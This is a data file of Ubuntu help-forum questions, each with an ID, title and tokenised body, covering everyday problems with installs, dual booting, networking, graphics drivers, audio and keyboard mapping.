407521	black screen after failed install on hp mini 1000	everything i read shows people who got past install . i did n't . now i have black screen and cursor after the hp page , ca n't access bios at all . any ideas ? does n't matter what i have plugged in or what f keys i hit , loads very quickly to black screen and cursor . had ubuntu on 16g usb for install , used pendrivelinux to make the usb . i was installing over windows 7. edit for more detail below** installation stopped at the create an account section . just hung until i finally restarted . since writing the above , i tried reloading the os on the usb and booting again and i was able to get to the purple screen and do the 'nomodeset ' option and then i hit 'install ' and also 'preview ubuntu ' but after hitting either one of those i would get the version screen and then black with a cursor again and nothing else would happen . never got any errors or warnings .
407522	after guest user session used , j . random user appears in menu	i let someone that borrowed my computer for email etc , and they logged into a guest session , they did their business and i logged back into my account . and know i see a `` j . random user '' in the unity power menu applet , when loggin into my account . should i be concerned of malicious activity and how do i fix this ?
407524	issue launching chrubuntu after apparent install	i have an acer chromebook c710-2847 . i am trying to install chrubuntu . the main issue that shows up is that while the install runs to an apparent completion , i am never able to actually get to ubuntu . my basic appoach is that which seems to be well accepted , http : //www.youtube.com/watch ? v=4qpjtzav3kw but after the install , it does not boot into ubuntu and forcing priority of the kernal does not seem to work either . i do notice that at the very end of the install , i do get some sort of error which i paraphrase here : ( note i was not able to capture all details ) error kernal fil e2fsck 1.42 ( 29-nov-2011 ) pass 1 ..some text here pass 2 ..some text here pass 3 ..some text here pass 4 ..some text here pass 5 ..some text here resizing file system to 54428800 begin pass 1 ( max =1560 ) extending inode table file system on /dev/sda7 is now 52428800 long chronos @ localhost ~ $ ( i think ) at which point the system then reboots ... and launches chrome , not ubuntu i went back in and tried to force the os kernal hierarchy as well , to no avail , chrome keeps launching note that i am suspecting this is a related post to the follow existing posts : how do i access ubuntu on acer chromebook after installation ? chromebook install ubuntu but i can not to start ubuntu . acer c7 ubuntu 12.04 boot issue please help
407526	how to install igi-2	i have installed wine then i opened the .exe file of igi-2 with wine . the game was working but many things were invisible in the game ( like building was not visible ) is there any way by which i can install igi-2 and play the game normally .
407529	how to connect ethernet as keeps on disconnecting	i have installed ubuntu 13.04 on asus maximus v extreme and the ethernet shows up and connects and disconnects , i configured it manually and then it connected but nothing on the webpages . need help desperately
407530	how can i create and configure icon themes in gnome ?	i know the basics for designing icons but i have no idea how to configure and compile them into a file so that i can create a gnome icon theme out of them . can anyone help ? it would be much appreciated : ) or maybe even link me to a tutorial that explains the basics .
407531	problems installing libre office 4.1 - tar.gz	i 've downloaded libre office 4.1 for my ubuntu 12.04 lts , then opened the tar.gx file and clicked on install and then get this : there was a problem opening the file /home/fmfalcao/.cache/.fâś4.2_linux_x86_rpm/install any reason why ? i 've just installed the chrome browser without difficulty and and older version of libre office is already on my machine- i just wanted the newer package .
407532	ubuntu does n't detect wifi-reset network scripts	i am a new user of ubuntu . recently i was trying to set up an infrastructure hotspot in ubuntu to connect my android to the eth connection , following some answers given in this forum . however it did not succeed , and when i booted my system , the eth connection was n't working , along with no wifi recognition . i deleted the eth connection , that must have reset the eth connection and it started working again . however although my wifi is on , it does n't detect any signal . it shows wireless network and below it device not managed . how do i fix this ?
407534	difference between tar and deb	what is the difference between a .tar.gz file , a .tar.xz file and a .deb file ? are all of them archives ? when i download a software from the internet , i sometimes get a .deb file , but sometimes i also get a .tar.gz file . do , i treat the installation of a .tar.gz file differently from that of a .deb . i usually install .deb files using the comman line instruction sudo dpkg -i < filepath.deb > . do , i do the same with the .tar.gz file or something different ?
407538	virtualhost ftp server	i have an appache2 web server , and a separate ftp file-server . now i would like to combine the services to one machine , but i want to retain the host-name for the file-server once i move it to the web-server . how can i do this ? also , what are there name limitations to virtual hosts ? my domain is um.maine.edu can i name my hosts anything within that domain ? ( provided it wont cause conflicts for other host names on the network . )
407539	touch sdk expansion	in the ubuntu touch sdk description http : //design.ubuntu.com/apps/building-blocks/expansion there is an ui element which is mentioned , namely the expansion . from the description i do n't really understand if there it is a proper ui element or a property of another ui element ( like the list view , since in the example it is applied to it ) . since i think this feature is useful and i want to use it for one of my projects can someone explain to me how i can use it ? or is it now still implemented ? thanks !
407541	how to make a windows partition bootable from ubuntu ?	when installing lubuntu , i 've decided to resize a ntfs partition first ( from 4gb to 900mb , to free up some space ) . there was no os there , but it was bootable and contained boot.ini , which loaded windows on other partition ( yes , i know it 's complicated ) . i was resizing partitions using standard lubuntu installer . the procedure finished with an error ( no detais , just `` there was an error ... '' ) and i ended up with a broken bootable partition . here 's what i have now : the good partition turned into two blocks ( `` filesystem 900mb '' , white text , and 3.3gb `` free space '' ) what i need , prioritized : make it possible to run windows on 4.2gb ntfs i hope to recover data on broken partition ( any recommendations ? ) thank you for attention !
407543	how to switch desktop layout from tty before startx ?	i would like to login with the same user in another tty , but each tty should have different desktop environment like kde and lxde . how can i use tty to start x server by providing the desktop type ?
407544	`` device not available '' message when starting ubuntu 13.10	when starting ubuntu 13.10 ( installed it using minimal cd ) , i get the following error : [ 17.0620661 ] via-ircc 0000:00.11:0 device not available ( ca n't reserve [ iox0800-0087f ] ) how do i resolve this issue ?
407547	how can i add , and use , a color scheme for geany ?	i have found that one of my favorite text editors for programming is geany , however the default color scheme is very bright and hurts my eyes when programming for awhile . there are other color schemes available for geany but no clear way for installing and using them . anyone have an idea ?
407551	steam package dependencies can not be resolved	this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : steam-launcher : depends : curl but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.5 is to be installed trying to install steam on 12.04 lts but im getting this error when i try to install .
407552	openbox ubuntu 12.04 does n't work properly	i uninstalled metacity and replaced it with openbox . however , it 's not working properly . as a result , i 'm not able to login to ubuntu desktop 12.04 . i 'm not able to do anything when i login under openbox or gnome openbox . how do i repair this so that i can login back to ubuntu 12.04 desktop ?
407555	long delay during netinstall/minimal install	i 've installed ubuntu using the netinstall/minimal install method many times in the past but the last few times i 've done it there 's been a very long delay where there never used to be one . once the mirror is selected it will sit at that point for a very long time ( at least 20mins ) . what is actually happening at this point ? is it downloading something ? hence the long wait . for a number of recent installs i have left it and eventually it has moved onto the next stage `` loading additional components '' . if i did n't know that it was going to make it to the next stage i would have assumed it had crashed . i realise it does have to do a lot of downloading but i thought that was done later on during the downloading packages step .
407565	12.04lts - ca n't connect to wireless or wifi	i am a new user to ubuntu , and inherited a laptop with 12.04lts on it . neither wired nor wireless internet works . i 'd like to get both to work . here is the output to ifconfig : lo link encap : local loopback inet addr:237.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:516 errors:0 dropped:0 overruns:0 frame:0 tx packets:516 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:41264 ( 41.2 kb ) tx bytes:41264 ( 41.2 kb ) can anyone help ? thank you ! ! edit : lspci -nn|grep -e 0200 -e 0280 shows : 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
407567	pascal/fortran/c++ compilers	i am retired and having some time on my hands , got out my old data structures textbooks from the 80s . i got to thinking how much i would like to revive my skills in pascal/c++ and use the techniques in the books . about 4 years ago , i bought a distribution of ubuntu on dvd and successfully loaded it . i could never find any mention of how to do any development even though the literature seemed to imply that ubuntu included these compilers . i gave up on this but recently decided to try again . what is the best way to do software developmemnt on ubuntu ?
407574	how can i disable scrolling between windows if my mouse is in the xfce panel ?	my frustration is that after selecting a window button on my panel ( xubuntu 12.04 ) , if i do n't move my cursor away from the window buttons and begin scrolling ( intending to scroll the content within the window ) , the windows manager cycles through all of the open windows . how do i disable the window button scrolling feature ? i have tried looked in windows manager settings , windows manager tweaks settings , panel settings , windows button settings and xfwm4 settings in the settings editor but could n't find anything to change it . online , the closest thing i have found is this libwnck-noscroll ppa . despite the fact that it said it was made for older distros , i tried it and it did n't work . is anyone aware of another fix ?
407576	will installing the gedit 3.9.3 ppa break my system because of adding gnome 3 staging ?	i would like to get the new gedit version , but you have to add the gnome3 staging ppa and i 've heard that gnome 3.10 can/will cause issues with unity , as i read here : now – and it’s important you’re aware of this – some of the packages in these repositories are reported to have stability issues . most of these will be minor – i.e. , the odd app crash or broken feature – but the potential for more major issues , like making gnome crash entirely , is possible . does that still apply ? the respositories that have to be added are these : $ sudo add-apt-repository ppa : ricotz/staging $ sudo add-apt-repository ppa : gnome3-team/gnome3 $ sudo add-apt-repository ppa : gnome3-team/gnome3-staging $ sudo add-apt-repository ppa : ricotz/testing will these install gnome 3.10 and will it break unity ?
407579	error creating android emulator	when i try to create an android sdk from terminal like ./android create avd -n nexus4 -t 19 -- skin 768x1280 i get an error like valid abis : no abis . error : this platform has more than one abi . please specify one using -- abi . but my emulator gets created if i try the same for target 16 how should i fix this ?
407580	setting up ogre on eclipse ( 3.8 )	ogre version : v1.8.1 ubuntu : 12.10 ( i am setting up from scratch not cmake ) i compiled from source and it ( ogresdk ) seems to be installed correctly ; however , i am unsure how to setup eclipse since the tutorial provided is for eclipse 3.6 and everything is correct and done up until , section : `` project configuration , '' '' -again under the c/c++ build section , click on settings -click on the tool settings tab -under the gcc c++ compiler section , click on includes '' when i look there is only , `` tool chain editor , '' and if i go to tool chain editor , there is no option for , `` include . '' only `` manage configurations '' and `` select tools , '' neither prompt for a directory .
407588	dual boot question	i have xubuntu , and xp in a separate partition on a single hard disk . xubuntu was installed first . xp shows up on the boot menu , but gives `` disk error '' when clicked i know this is a very old problem , but i can not find a solution anywhere i am not xubuntu literate and need a patient advisor i remember in the past it was suggested that one had to install xp first , but i am reluctant to reinstall everything
407590	how to reconfigure keyboard ( w and p not functioning correctly )	i was reluctant in asking this question but everything i 've researched has led me to a dead end . shift + w and shift + p are n't working correctly . so i 'm unable to use w and p unless i use the caps lock . right now my keyboard was somehow configured as : shift + w == xterm shift + p == nothing but i want my keyboard to be configured like so : shift + w == w shift + p == p ctrl + w == xterm i 'm not even sure how to use xmodmap to accomplish this , or if theres a different way to do this . any help or advice would be much appreciated ! solution the correct solution was to uninstall everything that was associated with xbindkeys
407591	failover solution	lets say i have a server that runs a program that runs some application . i saw there is a solution called pacemaker or high availibility . is there a way to make it so the second server has the same exact data and is synced with all the data on the first one so that if the first one goes out the second server has everything the first one had ? is there a way to do it with just two servers and no other hardware ?
407594	wifi hotspot not working with mobile devices on ubuntu	wifi hotspot not working with windows phone 8 and of course its not working with a any other phones as well . i have tried both android and windows phone 8 . either of these devices does n't even detect ubuntu 's hotspot as i have tried many possible ways.. link i referred to : how to turn your ubuntu laptop into a wireless access point
407598	ubuntu touchpad issues	my touch pad is not scrolling when i try opening synaptiks i get the message `` could n't find synaptics properties . no synaptics driver loaded ? `` , and in mouse and touch pad settings i do not get any touch pad option , i think the touch pad is being recognised as a generic mouse . any help appreciated .
407601	typical issue but fixes do n't work - no ethernet connection on freshly installed 12.10	i have freshly installed ubuntu . i have done all forum fixes to no avail , except now my ifconfig shows two things instead of just the lo . eth0 . link encap : ethernet . hwaddr 00:1a:92:15:72:84 up broadcast multi cast mtu : 1500 . metric:1 rx and tax lines have all zeros collisions:0 . txquelen:1000 rx and tax bytes all zeros lo . link encap : local loopback inlet addr : 127.0.0.1 . mask : 255.0.0.0 inlet6 addr : 1/128 . scope : host up loopback running . mtu : 65536 . metric : 1 rx and tax packets at 48 and rest are zeros collisions : 0 . txqueken : 0 rx and tax bytes are both at 3936 please tell me , is anything wrong up there ? please forgive my errors as i 'm doing this on a tablet
407602	ca n't install nvidia drivers , multiple methods tried , all failed , have reinstalled ubuntu multiple times	i have never used a linux distribution before in my life . after downloading ubuntu 13.10 because it is the only one compatible with my motherboards onboard lan , i wanted to install the drivers for my gtx 760 . i downloaded them directly from the nvidia site . upon rebooting ubuntu would not load the desktop and would only display that it wanted to load low graphics mode . i have tried each solution in this thread : how to fix `` the system is running in low-graphics mode '' error ? and none worked . i have tried multiple other methods for installing my drivers , all of which claim to be the proper way and none work , all cause the same error . i am now in a fresh working install of ubuntu with no other operating systems on this machine , if someone could step by step tell me how to install my drivers that would be much appreciated . as a side note , this is not the only problem i have encountered , my r.a.t 3 gaming mouse also does not work with ubuntu and causes a similar error as what happens with my video drivers when i try to implement the fixes i have found for it . these issues are very discouraging and if i do n't figure them out soon i believe i will switch back to windows .
407605	how to identify the process locking a file ?	i want to know the exact process that is using the lock file . i do n't want to fix it , but just to know what is my system doing . how can i find out ? for example , this message : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? again , i just want to identify the process using it , not how to fix it .
407609	how do i make update manager work	this is the error message ( below ) i get when i try to update through update manager . can anyone help me with this one ? w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
407610	reinstalling ubuntu if i lost my decryption key	i am new to ubuntu , but what 's even worse is that i have lost my key after installing ubuntu on an older machine a few months back . i have tried to boot the machine from a cd to reinstall , but i always end up at the grub . what is the best course of action for me to take in order for me to reinstall ubuntu on my machine ?
407612	can i download ubuntu on a mac and burn it to a cd for windows 7 ?	i am looking to download ubuntu on my mac and make a bootable cd or flash drive for a pc with windows 7. how could i do this ?
407617	why when downloading the ubuntu 13.10 the server downloading the old version of ubuntu 12.04.3 ?	can any one helping me , please ? why when downloading the ubuntu 13.10 the server downloading the old version of ubuntu 12.04.3 ?
407620	ca n't dual boot ubuntu 12.04 with windows 8.1 , partitioning problems	so this is my first time actually installing ubuntu without using wubi . i really need to do this for class , so i was wondering if someone could help me with my problem . so i went into the official windows partitioning software thing . first , made the space of my c : / drive smaller so i can have space for ubuntu . finally managed to access the live cd of ubuntu ... and it did n't have an option to `` install alongside windows 8 . '' so , i clicked on `` something else '' , and could n't find the space i made . i went back into windows and gave that space a drive name and stuff , and after getting back to `` something else '' ... i still could not find that space . i do n't know what do and i need this for my class . can someone help me out ? i 'm running windows 8.1 on an hp dv6 .
407621	no audio line out option gnome-alsamixer	i 'm running 12.04 , on an asus g50vt-x5 . here is the output from aplay list of playback hardware devices ** card 0 : intel [ hda intel ] , device 0 : alc663 analog [ alc663 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc663 digital [ alc663 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have gnome-alsamixer installed , along with pulseaudio volume control . my headphone jack is broken , and i 'm trying to get ubuntu to output my headphone jack to my line out jack , i had it working before i reinstalled ubuntu , but i had used some little application that totally trashed all audio drivers in gnome , but alsamixer still worked . i do n't want to go through that again , so does anyone have any idea how i can do this ?
407625	display driver and resolution issues	i 'm recently installed ubuntu 13.10 on my pc and it was working fine . however , i was messing around with conky ( the system resource monitor ) and was having some issues . i did a little research and someone said that it had to with nvidia drivers not being installed . so i installed the drivers and restarted the computer . however , i was presented with a black screen and my cursor after logging in . once again , i researched this and ended up going to tty1 and typing in sudo apt-get -- purge remove nvidia-* this worked as far as allowing me to access the unity interface and be able to use ubuntu , however now the only resolution my computer is using is 800x600 . it used to be 1920x1080 before this whole fiasco . i tried modifying the xorg.conf file but nothing happened . this is the ( modified ) xorg.conf file i currently have # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.38 ( buildmeister @ swio-display-x64-rhel04-12 ) wed jan 8 19:59:52 pst 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 modes `` 1920x1080 '' endsubsection endsection the part i modified is the `` display '' subsection . it used to only have the depth 24 line but after reading a little , others said adding those extra lines worked for them . also , when replying , please do n't assume i have any linux/ubuntu knowledge because this is the first time i 'm using linux . thanks ! edit : i figured posting the output of xrandr may help : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 800 x 600 , maximum 800 x 600 default connected primary 800x600+0+0 0mm x 0mm 800x600 0.0* 640x480 60.0 edit 2 : also , here 's the output of lspci|grep vga : 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) it says that it only finds my intel card , but i have a nvidia gt740m as well .
407626	aptitude installing a lot of packages ?	i recently launched aptitude only to notice that it wanted to install 2gb of packages `` to satisfy dependencies '' . is is normal for aptitude to want to install this many packages all at the same time ?
407627	format usb drive ( remove windows .exe virus )	i tried to format the drive using disk utility and following the steps given in the link below : visit how to format a usb or external drive ? but unfortunately this error keeps popping up every time i try formatting : error creating file system : command-line mkfs.vfat -i -n `` new volume '' `` /dev/sdc1 '' exited with non-zero exit status 1 : stdout : mkfs.vfat 3.0.14 ( 23 jan 2023 ) stderr : `mkfs.vfat : /dev/sdc1 contains a mounted file system. ' ( udisks-error-quark , 0 )
407631	how to create new files or modify existing files in a sym link ?	i am new to the lamp environment . i wanted to create files directly in my home directory instead of always copying it to /var/www . i created a sym link using the following command : ln -s /var/www ~/workspace/www now i can see a sym link www created in ~/workspace . i can access files in wwww . but , i ca n't modify existing files or create new files . i know i am missing something . can someone please help ?
407632	hindi traditional or inscript keyboard layout not available	i do not want to use hindi ( bolnagri ) or hindi ( wx ) phonatic layouts . is hindi inscript or traditional layout available for ubuntu ?
407636	why is size of paid/0 $ apps `` unknown '' in usc ?	when you look at the free software in ubuntu software center , you will be shown the size of those apps as below . total size 32mb to download,100mb when installed . but in case of paid softwares ( not installed ) you are shown . total size unknown basically , all that usc has to do is that send a call to the server to know the size of the .deb package ( that 's what it does when it says total size calculating ... ) then why ca n't usc do the same with paid apps ? note : - if we know the size of software we are about to download , it helps a lot when your network connection is slow.you can ensure that you wo n't fall less by few mb 's while downloading an app of gb's.and you can avoid the embarrassment that comes due to it .
407637	how do i change the order of graphics cards ?	ubuntu 13.10 . mining rig . 7ea graphics cards ( 2 7900 's and 5 7800 's ) . adapter 0 is a 7900 , adapter 1-5 shows 7800 , adapter 6 shows 7900 . how can i make adapter 0 and 1 7900 's while 2-6 are 7800 's ? it 'd help me a whole lot in my cgminer config file . thanks as always askubuntu !
407639	why is firefox not respecting my plugin choices for amr files ?	i have been trying to get amr files , which is the default format of evernote , to play in firefox . if i download an amr file to my computer , it plays fine with totem ( which i think is now called videos ... ? ) but amr files do not play when embedded in a web site . at least not on the evernote web site . at first , my install of firefox defaulted to trying to use vlc to play amr files , but they would not play . so i tried to switch my plugin preference to totem . there was no automatic totem option , so i selected to open the files with /usr/bin/totem . despite setting it that way , firefox still insisted on opening with vlc . eventually , i had to completely remove the vlc mozilla plug in with synaptic . having done that , this is what i see when i open an audio file on the evernote web site : annoyingly , there is nowhere to click , nothing to do so that i can select a plugin . in the preferences , i have selected to use totem : ... but this is having no effect . i tried just making it so that amr files download : ... but that did n't change anything either . i still get the plugin error graphic above . the only way i can play amr files from evernote is to go through a tedious process of viewing the source of the frame within the web page and text searching for the amr extension and then copying and pasting that to a new window ... that process is obviously too inefficient for dealing with many audio files . i may just drop evernote completely if the audio is going to be this much of a hassle . nonetheless , the real question here is , why is firefox not respecting my selections for how to handle these files ? regardless of whether or not the vlc or totem plugins can handle amr files , if i say to download the files , that 's what it should do , should n't it ? update : here is an evernote audio file that i shared so that people could test for themselves if they can get it to play .
407642	no signal message and black screen on tv with hdmi port 13.10	when i plug in the hdmi cable from computer to tv , i get no signal words on a black tv screen
407645	built in speaker not working	i am facing problem with my built in speaker from last two days . it was working fine before my last auto update . when checking for sound settings -- > output , i can see 2 options 1 . digital output ( s/pdif ) built-in audio speaker built-in audio and previously i saw it was taking option-2 as default and everything working ok . but now its taking option 1 , and if i select option-2 , its again going back to option-1 . looks like some audio driver corruption i hope . do i have to reinstall the audio drivers ? if yes , then how ? i am not able to find any steps from ubuntu forums ( am i missing something ? ) details : audio driver : speedo @ speed : ~ $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 01:00.1 audio device : nvidia corporation gf119 hdmi audio controller ( rev a1 ) speedo @ speed : ~ $ system info : speedo @ speed : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise speedo @ speed : ~ $ uname -a linux speed 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux speedo @ speed : ~ $
407646	pexhdcap 1080p video capture card	does anyone know if the pexhdcap card will work in ubuntu ? i ca n't find any information supporting that it will . i 'm trying to record hdmi out from a camcorder using ubuntu .
407648	the following packages have unmet dependencies	i followed instruction at build a litecoin mining rig , then typed in the very first line and now i 'm stuck . ubuntu @ xubuntu : ~ $ sudo apt-get install fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : fglrx-updates : depends : lib32gcc1 but it is not going to be installed depends : xorg-video-abi-12 but it is not installable e : unable to correct problems , you have held broken packages . xubuntu @ xubuntu : ~ $ how can i solve this issue i 'm rookie so could someone help please and in relatively simplistic language please
407649	i have a logitech v220 cordless mouse	the scroll wheel is not recognized by the xunbuntu os i have loaded on my older hp laptop . logitech does not have drivers for linux os . is there a way to get the scroll wheel/third button to operate under xunbutu ?
407652	ubuntu 13.10 resets key map loaded with xmodmap when switching keyboard layout	i 'm trying to switch left ctrl key with capslock . i took theese lines from manual to xmodmap : remove lock = caps_lock remove control = control_l keysym control_l = caps_lock keysym caps_lock = control_l add lock = caps_lock add control = control_l and placed them into .xmodmap after command xmodmap .xmodmap i can see desired behavior . however if i switch my keyboard layout the key map resets to default . is it possible to have left ctrl and capslock switched over sourse changes ?
407654	ubuntu installation problem !	i am using win7 . i want to put ubuntu as a dual boot . i have 3 partitions in windows . when i boot ubuntu dvd ubuntu detects whole hard-disk as one space rather the the three partitions . even if i select something else there also the whole hard-disk is shown with out any partitions . i tried shrinking one of my partition and made it un-allocated . but still ubuntu is unable to detect the partitions . what can be the solution for this ? ? ? ? ? thanks . sankarshan
407659	i ca n't run applet on my firefox browser	i am a new user in ubuntu 13.10 , and i want to run an applet so , i installed java develop kit 7u45 with netbeans 7.4 and i can run applet from netbeans but not from browser because of security setting.i search about my problem and i change my security setting to low and every thing remain with out an change help me please
407660	windows 8.1 not showing up on grub during boot up . windows 8.1/ubuntu 13.10 dual boot	i have recently installed ubuntu 13.10 along side windows 8.1 on my laptop . after the install of ubuntu and restart , everything worked fine . windows 8.1 showed up in grub when the pc restarted to finish ubuntu installation , but when i restarted my computer later to go back to windows 8.1 , it does n't show up in grub . i have read other forums and no one has the question that i have , they 're similar , but are n't the right ones to help me . please help ! !
407662	flashplugin-installer fails to install ( unable to download the .tar..gz file )	i have had this `` failed to download package files '' window popping up regarding flashplugin-installer for a long time now . i have tried `` sudo apt-get remove -- purge flashplugin installer '' and then installing it again etc . to no avail , the window always pops back up and there is no libflashplayer.so anywhere . apt-get says : flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.310.orig.tar.gz which does not seem to exist . weirdly apt-get does not give off any errors when installing flashplugin-installer even though that file seems non-existant and the installation seems to fail since i get no libflashplayer.so anywhere . i have tried apt-get update but it does not help . why is apt-get trying to download a non-existant file and how can i fix this ? i 'd rather not install flash outside the package manager . i 'm using ubuntu 13.10 .
407664	ca n't read/edit existing files	i have ubuntu ( lubuntu 12.04 ) installed on sd card which i use in mk802 mini pc . when i mount sd card on my pc ( ubuntu 12.04 ) there is no possibility to read/edit files related to ssh ( e.g . etc/ssh_config or etc/sshd_config ) but i can see it in ls output : root @ boss : /media/d5578c69-a3c3-43be-a24f-9e1daaf6eb62/etc # ls -lrta ssh* total 168 -rw-r -- r -- 1 root root 302 jan 10 2011 ssh_import_id -rw-r -- r -- 1 root root 1669 apr 2 2012 ssh_config -rw-r -- r -- 1 root root 125749 apr 2 2012 moduli -rw-r -- r -- 1 root root 395 jun 12 2012 ssh_host_rsa_key.pub -rw -- -- -- - 1 root root 1679 jun 12 2012 ssh_host_rsa_key -rw-r -- r -- 1 root root 175 jun 12 2012 ssh_host_ecdsa_key.pub -rw -- -- -- - 1 root root 227 jun 12 2012 ssh_host_ecdsa_key -rw-r -- r -- 1 root root 603 jun 12 2012 ssh_host_dsa_key.pub -rw -- -- -- - 1 root root 672 jun 12 2012 ssh_host_dsa_key -rw-r -- r -- 1 root root 2498 dec 8 01:17 sshd_config drwxr-xr-x 2 root root 4096 dec 8 01:17 . drwxr-xr-x 120 root root 4096 jan 19 08:32 .. root @ boss : /media/d5578c69-a3c3-43be-a24f-9e1daaf6eb62/etc # cat sshd_config cat : sshd_config : no such file or directory other files in the same folder have no such problem . what can be the reason of such behavior ?
407665	installation interrupted	i was installing build essential through command line using '' sudo apt-get install build-essential '' . it took almost 4 minutes to reach 87 % and then i mistakenly pressed alt+ctrl+f12 and a black screen appeared and i had to reboot . on reboot , i removed all the files using `` apt-get remove build-essential '' and again tried to reinstall it . but now it takes only 5 seconds and prompts me the message : 0 upgraded , 1 newly installed , 0 to remove and 159 not upgraded . need to get 0 b/5,614 b of archives . after this operation , 37.9 kb of additional disk space will be used . selecting previously unselected package build-essential . ( reading database ... 195397 files and directories currently installed . ) unpacking build-essential ( from ... /build-essential_11.6ubuntu5_i386.deb ) ... setting up build-essential ( 11.6ubuntu5 ) ... and the process gets finished.i want to clean uninstall everything and go through the installation process of that 50 mb again.what should i do ?
407666	login to ubuntu server remotely using openssh with a dns	i want to set up my home ubuntu server running 12.04 to be able to login remotely with putty using a fqdn . how do i get a fqdn and what steps do i take to configure my server to be able to login remotely using putty on my win 8 laptop ?
407669	vlc crash on startup - certain dvd 's only	certain rented dvd 's do n't play . previously all dvd 's have worked , and can not figure out why particular dvd 's do n't read and vlc does n't even stay open . this is what happens : insert dvd , vlc startsup as normal but flashes on screen and closes . manually opening vlc does same thing . system check & updates done : latest version vlc - 2.0.8 default saucy 13.10 install checked codecs : sudo apt-get install ubuntu-restricted-extras sudo apt-get install libdvdcss2 libdvdnav4 libdvdread4 sudo apt-get install libavformat-extra-53 libavcodec-extra-53 libdvdread4 sudo /usr/share/doc/libdvdread4/install-css.sh also reset preferences . and checked disk device label - dev/ cdrom/cdrom1/sr0/sr1 and all could not read the dvd . am at a loss , for this one . thanks in advance .
407673	display backlight gone when boot to ubuntu 13.10 from pendrive for install to my notebook	my notebook is compaq cq41 209tu.i download ubuntu 13.10 and created a bootable usb drive . but after boot from usb , its ok. but when language select and install or try page come , my display back light gone ... it turned dark . hardly seen something dis color.what to do ? ? please help someone .
407674	cant login to ubuntu	writing on kindle , excuse grammar/spelling . did an update the other night and not been able to login , put in correctdetails , screen goes black , flash of white writing then back to login ( mousenotworkingeither ) so tried ctrl+alt+f1 to login , but when i do there is a continuous feed of suchlike ; 836.736blah , blah . usb 5-1 device i script or blah blah and hub 5-0 hub etc can anyone help ?
407675	how can i install ps3 joypad in wireless - bluetooth- mode ( steam compatible ) ?	i can connect and use my ps3 pad with the usb wire without issues , and then using xboxdrv i 'm able to fully use it as an xbox pad under steam . only issue is that i 'd like to use it as a wireless device . i 've got bluetooth enabled but i do n't seem to be able to link it and use it neither wireless neither with xboxdrv . i 'm using ubuntu 12.04 ( latest lts ) . any idea ? thanks !
407678	swap file not being utilized . program killed due to memory	i have set up a swap partition on 12.04 , as per the below . # swapon -s filename type size used priority /swapfile file 1048572 0 -1 # free -m total used free shared buffers cached mem : 490 484 6 0 4 23 -/+ buffers/cache : 456 33 swap : 1023 0 1023 i 'm trying to run a script which is quite memory intensive , but i 've run a number of times with this set up . this time round though , the swap file is not being utilized . when i start the process , used memory drops as cached memory is purged like so . total used free shared buffers cached mem : 490 398 92 0 6 24 -/+ buffers/cache : 367 123 swap : 1023 0 1023 and then i watch the memory again fill to 100 % used , at which point the program crashes . the swap never gets touched . i have n't had that much experience with memory issues or swapon/off previously , so just wondering where i might be going wrong ? i 'm not running the command as root , but i set the swapfile up as the root user . can permissions come into play with swap files ? do i need to enable swap files for each user ?
407679	how to install qtmultimedia source ?	i need qtmultimedia to compile an open-source project . but it was n't installed with qt . i 've tried sudo apt-get build-dep qtmultimedia5-dev but it does n't find such a package . i 've downloaded it from ubuntu site , but unable to compile - there 're just *.install files in tar.gz . how to get it ?
407680	how to install lego marvel super heroes in wine ?	basically as the title suggests , i would like to know how to install that game under wine in ubuntu 13.10 64-bit ?
